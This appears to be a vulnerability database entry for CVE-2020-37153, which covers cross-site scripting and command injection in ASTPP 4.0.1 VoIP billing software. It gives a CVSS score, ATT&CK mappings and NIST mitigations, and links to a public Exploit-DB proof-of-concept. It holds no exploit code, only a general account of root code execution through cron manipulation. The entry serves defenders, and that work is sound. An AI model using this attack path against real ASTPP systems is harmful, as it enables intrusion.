CVE-2020-37153
Published: 11 February 2026
Summary
CVE-2020-37153 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Inextrix Astpp. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 38.7th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly remediates the XSS and command injection flaws in ASTPP's SIP device configuration and plugin management interfaces through timely patching and flaw correction.
Prevents command injection and XSS exploitation by validating and sanitizing all user inputs to the vulnerable SIP device configuration and plugin management interfaces.
Enforces authentication and authorization to block unauthenticated remote access to the exploited SIP device configuration and plugin management interfaces.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unauthenticated command injection in public-facing web interfaces enables remote exploitation of public-facing application (T1190) and Unix shell command execution (T1059.004); XSS facilitates session hijacking but primarily covered under exploitation.
NVD Description
ASTPP 4.0.1 contains multiple vulnerabilities including cross-site scripting and command injection in SIP device configuration and plugin management interfaces. Attackers can exploit these flaws to inject system commands, hijack administrator sessions, and potentially execute arbitrary code with root permissions through…
more
cron task manipulation.
Deeper analysisAI
CVE-2020-37153 is a set of multiple vulnerabilities in ASTPP 4.0.1, including cross-site scripting (CWE-79) and command injection flaws within the SIP device configuration and plugin management interfaces. ASTPP is an open-source VoIP billing and provisioning system. The vulnerability carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), reflecting its critical severity due to the potential for high-impact remote exploitation.
Unauthenticated attackers can exploit these issues remotely over the network with low complexity and no user interaction required. Exploitation enables injection of system commands, hijacking of administrator sessions via cross-site scripting, and execution of arbitrary code with root permissions through manipulation of cron tasks, compromising confidentiality, integrity, and availability.
Advisories and related resources include the official ASTPP GitHub repository at https://github.com/iNextrix/ASTPP, the project website at https://www.astppbilling.org/, a proof-of-concept exploit on Exploit-DB at https://www.exploit-db.com/exploits/47889, and a VulnCheck advisory detailing ASTPP VoIP remote code execution at https://www.vulncheck.com/advisories/astpp-voip-remote-code-execution. Practitioners should consult these for mitigation guidance and patch details.
Details
- CWE(s)